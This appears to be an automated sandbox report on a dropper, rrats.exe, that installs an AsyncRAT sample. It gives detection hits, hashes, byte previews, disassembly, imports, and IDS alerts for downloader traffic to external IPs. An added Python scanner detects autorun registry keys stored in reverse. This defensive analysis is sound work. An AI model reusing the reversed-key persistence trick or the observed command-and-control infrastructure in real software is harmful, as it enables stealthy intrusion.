                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\explore.exe, Author: ditekSHen
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xc................................. ... ....@.. .......................`............`.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........v...............s.................................................V..;...$0.xC.=VD..b......9A../.\.....{....*"..}....*..{....*"..}....*..{....*"..}....*J.(.....s....}....*2s6....o2...*2.{....o....*.s.........*..(....*.s.........*.(7...*.~....*.......*.~....*.......*.~....*.......*.~ ...*... ...*.~!...*...!...*.~"...*..."...*.~#...*...#...*.~$...*.~%...*...%...*.~&...*...&...*.~'...*...'...**.(B......*2~.....oC...*.s.....$...*jsq...%.oV...%.oW...oX...&*.(>...*.(b...
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):67584
                                                            Entropy (8bit):5.599686577325716
                                                            Encrypted:false
                                                            SSDEEP:1536:6HDTgTiogco7Uk7u9LbMqDLuMYFYZR4v7vf+:6jTgTiogcq+LbM2CFc8m
                                                            MD5:3D91C31A52BE4E262F7F18272294ED99
                                                            SHA1:7C120A607650348FC4DFCDACDC77BF5885A9E6AC
                                                            SHA-256:B99B28B82C9DA1B009898DA323D4793DDE7828EFCF777A56A835D54CBFEC849D
                                                            SHA-512:D17CC9DB4D263ADDD524BAA7B67974B2D4F0B904F46367CD6138805CD65A8364EA700A9DF147DBB6DAC8B1E7288A87FE24C497E1B1825F49B576E101789856D1
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Explorer.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Explorer.exe, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\Explorer.exe, Author: ditekSHen
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xc................................. ... ....@.. .......................`............`.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........v...............s.................................................V..;...$0.xC.=VD..b......9A../.\.....{....*"..}....*..{....*"..}....*..{....*"..}....*J.(.....s....}....*2s6....o2...*2.{....o....*.s.........*..(....*.s.........*.(7...*.~....*.......*.~....*.......*.~....*.......*.~ ...*... ...*.~!...*...!...*.~"...*..."...*.~#...*...#...*.~$...*.~%...*...%...*.~&...*...&...*.~'...*...'...**.(B......*2~.....oC...*.s.....$...*jsq...%.oV...%.oW...oX...&*.(>...*.(b...
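The dropped rrat.exe and the two byte-identical copies above (explore.exe under AppData\Local and Explorer.exe under AppData\Roaming share the same SHA-256) all match INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse. The idea behind that rule is that a binary which stores an autorun registry path backwards and reverses it at run time slips past a plain string scan for "CurrentVersion\Run". The scanner below is an added example of the technique, not ditekSHen's rule and not code from the report: its list of autostart keys is an illustrative subset (assumption), it searches the reversed spelling both as ASCII and as UTF-16LE (the "wide" form .NET string literals use), case-insensitively, and the input blob is constructed to contain one ASCII hit, one wide hit and a forward-spelled key that must not match.

```python
from typing import Dict, List

# Illustrative subset of autostart (ASEP) registry paths; an assumption, the real rule carries its own list.
ASEP_KEYS = [
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders",
    "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",
    "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows",
]


def reversed_patterns() -> Dict[str, Dict[str, bytes]]:
    """Each key spelled backwards and lower-cased, as ASCII and as UTF-16LE (Yara's 'ascii wide nocase')."""
    out = {}
    for key in ASEP_KEYS:
        rev = key[::-1].lower()
        out[key] = {"ascii": rev.encode("ascii"), "wide": rev.encode("utf-16-le")}
    return out


def find_reversed_asep(data: bytes) -> List[Dict]:
    """Case-insensitive scan; one record per occurrence with the forward key, the encoding and the offset."""
    haystack = data.lower()      # bytes.lower() folds only ASCII letters, which is all this needs
    hits = []
    for key, patterns in reversed_patterns().items():
        for encoding, pattern in patterns.items():
            start = haystack.find(pattern)
            while start != -1:
                hits.append({"key": key, "encoding": encoding, "offset": start})
                start = haystack.find(pattern, start + 1)
    return hits


def reversed_keys_in(data: bytes) -> List[str]:
    """Distinct keys found, in scan order; enough for a quick verdict on a sample."""
    seen: List[str] = []
    for hit in find_reversed_asep(data):
        if hit["key"] not in seen:
            seen.append(hit["key"])
    return seen


# Constructed blob standing in for a scanned binary: the Run key reversed as an ASCII string,
# Winlogon reversed as a UTF-16LE string, then the Run key spelled forwards (must not match).
CONSTRUCTED_BLOB = (
    b"\x00" * 16
    + ASEP_KEYS[0][::-1].encode("ascii")
    + b"\x00" * 8
    + ASEP_KEYS[4][::-1].encode("utf-16-le")
    + b"\x00" * 8
    + ASEP_KEYS[0].encode("ascii")
)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else CONSTRUCTED_BLOB
    for hit in find_reversed_asep(blob):
        print(f"0x{hit['offset']:08x} {hit['encoding']:<5} {hit['key']}")
```

Run it against a dumped .NET assembly with `python3 asep_reverse.py sample.exe` (file name assumed); a hit is only an indicator, since legitimate installers occasionally obfuscate strings too, so pair it with the persistence behaviour the sandbox actually observed.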
                                                            Process:C:\Windows\SysWOW64\timeout.exe
                                                            File Type:ASCII text, with CRLF line terminators, with overstriking
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.41440934524794
                                                            Encrypted:false
                                                            SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                            MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                            SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                            SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                            SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                            Malicious:false
                                                            Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.355929597315391
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:rrats.exe
                                                            File size:506'223 bytes
                                                            MD5:a2bdb024c98b7e8d3d06fc86e110d204
                                                            SHA1:2442360d37bf7e60b0d20c447bf5a0b51635a1d4
                                                            SHA256:72cd6d490f03122c90b4a52c8bc7fb5b938123eaf4926b5cc5cee14f44bef3cf
                                                            SHA512:b60afa45e29ddee3e3dc0d7e61bd5b9f3fb1d0c03a0655ab8f6c80b1fc5d6ff51f1b07a1af7ab1ce28d373f990d830f2f1c6e3c0e1efbaa280361a250ecb6850
                                                            SSDEEP:6144:rTouKrWBEu3/Z2lpGDHU3ykJVX+tLC/Jm808PYfz1b8s4GYAMwX:rToPWBv/cpGrU3yUX+tLGA8mJbV2o
                                                            TLSH:7EB4E0027AC188B2D0631D325A796B21A93DBD202F75CEEF63D42A6DDA316C0D735772
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                            Icon Hash:1515d4d4442f2d2d
                                                            Entrypoint:0x41f530
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                            Instruction
                                                            call 00007F5678C2ABDBh
                                                            jmp 00007F5678C2A4EDh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            push dword ptr [ebp+08h]
                                                            mov esi, ecx
                                                            call 00007F5678C1D337h
                                                            mov dword ptr [esi], 004356D0h
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            and dword ptr [ecx+04h], 00000000h
                                                            mov eax, ecx
                                                            and dword ptr [ecx+08h], 00000000h
                                                            mov dword ptr [ecx+04h], 004356D8h
                                                            mov dword ptr [ecx], 004356D0h
                                                            ret
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            mov esi, ecx
                                                            lea eax, dword ptr [esi+04h]
                                                            mov dword ptr [esi], 004356B8h
                                                            push eax
                                                            call 00007F5678C2D97Fh
                                                            test byte ptr [ebp+08h], 00000001h
                                                            pop ecx
                                                            je 00007F5678C2A67Ch
                                                            push 0000000Ch
                                                            push esi
                                                            call 00007F5678C29C39h
                                                            pop ecx
                                                            pop ecx
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007F5678C1D2B2h
                                                            push 0043BEF0h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007F5678C2D439h
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007F5678C2A5F8h
                                                            push 0043C0F4h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007F5678C2D41Ch
                                                            int3
                                                            jmp 00007F5678C2EEB7h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push 00422900h
                                                            push dword ptr fs:[00000000h]
                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xe51f | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x73000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xe51f | 0xe600 | 87359dd25db4d139d87ccd958f448ad1 | False | 0.6252207880434782 | data | 6.58339595740304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x73000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64644 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x6518c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66738 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66ca0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67548 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x683f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68858 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69900 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6bea8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x6fc1c | 0x2f8 | data | German | Germany | 0.4723684210526316
RT_DIALOG | 0x6ff14 | 0x160 | data | German | Germany | 0.59375
RT_DIALOG | 0x70074 | 0xf0 | data | German | Germany | 0.6916666666666667
RT_DIALOG | 0x70164 | 0x148 | data | German | Germany | 0.5792682926829268
RT_DIALOG | 0x702ac | 0x354 | data | German | Germany | 0.43896713615023475
RT_DIALOG | 0x70600 | 0x278 | data | German | Germany | 0.5759493670886076
RT_STRING | 0x70878 | 0x234 | data | German | Germany | 0.39361702127659576
RT_STRING | 0x70aac | 0x268 | data | German | Germany | 0.39285714285714285
RT_STRING | 0x70d14 | 0x218 | data | German | Germany | 0.416044776119403
RT_STRING | 0x70f2c | 0x1a0 | data | German | Germany | 0.5288461538461539
RT_STRING | 0x710cc | 0x5c4 | data | German | Germany | 0.3313008130081301
RT_STRING | 0x71690 | 0x1a8 | data | German | Germany | 0.4363207547169811
RT_STRING | 0x71838 | 0x198 | data | German | Germany | 0.4950980392156863
RT_STRING | 0x719d0 | 0x168 | data | German | Germany | 0.425
RT_STRING | 0x71b38 | 0xf0 | data | German | Germany | 0.5791666666666667
RT_STRING | 0x71c28 | 0x13c | data | German | Germany | 0.4936708860759494
RT_GROUP_ICON | 0x71d64 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x71dcc | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
German | Germany |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-09T14:12:40.786601+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49760 | 172.67.19.24 | 80 | TCP
2024-12-09T14:12:53.020544+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49795 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:02.207565+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49819 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:08.614808+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49836 | 172.67.19.24 | 80 | TCP
2024-12-09T14:13:11.467632+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49844 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:20.624120+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49869 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:29.787528+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49894 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:36.117241+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49911 | 172.67.19.24 | 80 | TCP
2024-12-09T14:13:38.962820+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49919 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:48.479837+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49942 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:54.927268+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49959 | 172.67.19.24 | 80 | TCP
2024-12-09T14:13:57.774564+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49968 | 172.67.19.24 | 443 | TCP
2024-12-09T14:14:06.899015+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49994 | 172.67.19.24 | 443 | TCP
2024-12-09T14:14:13.630369+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50010 | 172.67.19.24 | 80 | TCP
2024-12-09T14:14:20.317839+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50021 | 172.67.19.24 | 80 | TCP
2024-12-09T14:14:26.523182+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50023 | 172.67.19.24 | 80 | TCP
2024-12-09T14:14:34.583291+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50026 | 172.67.19.24 | 80 | TCP
2024-12-09T14:14:41.130094+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50028 | 172.67.19.24 | 80 | TCP
2024-12-09T14:14:47.676907+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50030 | 172.67.19.24 | 80 | TCP
2024-12-09T14:14:54.442475+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50033 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:01.185178+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50036 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:07.864248+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50039 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:22.618944+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50047 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:37.637427+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50053 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:38.178561+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50053 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:44.362516+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50054 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:44.785853+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50054 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:51.334402+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50056 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:57.863773+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 50057 | 172.67.19.24 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 14:12:09.245723009 CET | 49704 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:09.365972996 CET | 80 | 49704 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:09.366061926 CET | 49704 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:09.370579958 CET | 49704 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:09.489947081 CET | 80 | 49704 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:10.460917950 CET | 80 | 49704 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:10.463355064 CET | 49705 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:10.463407993 CET | 443 | 49705 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:10.463476896 CET | 49705 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:10.505367041 CET | 49704 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:10.550622940 CET | 49705 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:10.550648928 CET | 443 | 49705 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:11.767957926 CET | 443 | 49705 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:11.768126011 CET | 49705 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:11.771980047 CET | 49705 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:11.771991014 CET | 443 | 49705 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:11.772274017 CET | 443 | 49705 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:11.817878008 CET | 49705 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:11.825124025 CET | 49705 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:11.867357969 CET | 443 | 49705 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:12.400613070 CET | 443 | 49705 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:12.400711060 CET | 443 | 49705 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:12.400804043 CET | 49705 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:12.470053911 CET | 49705 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:12.485497952 CET | 49706 | 88 | 192.168.2.5 | 194.67.204.7
Dec 9, 2024 14:12:12.604994059 CET | 88 | 49706 | 194.67.204.7 | 192.168.2.5
Dec 9, 2024 14:12:12.605117083 CET | 49706 | 88 | 192.168.2.5 | 194.67.204.7
Dec 9, 2024 14:12:12.605969906 CET | 49706 | 88 | 192.168.2.5 | 194.67.204.7
Dec 9, 2024 14:12:12.725224018 CET | 88 | 49706 | 194.67.204.7 | 192.168.2.5
Dec 9, 2024 14:12:34.486949921 CET | 88 | 49706 | 194.67.204.7 | 192.168.2.5
Dec 9, 2024 14:12:34.487023115 CET | 49706 | 88 | 192.168.2.5 | 194.67.204.7
Dec 9, 2024 14:12:39.505662918 CET | 49706 | 88 | 192.168.2.5 | 194.67.204.7
Dec 9, 2024 14:12:39.505955935 CET | 49704 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:39.506767035 CET | 49760 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:39.625181913 CET | 88 | 49706 | 194.67.204.7 | 192.168.2.5
Dec 9, 2024 14:12:39.625825882 CET | 80 | 49704 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:39.625989914 CET | 80 | 49760 | 172.67.19.24 | 192.168.2.5
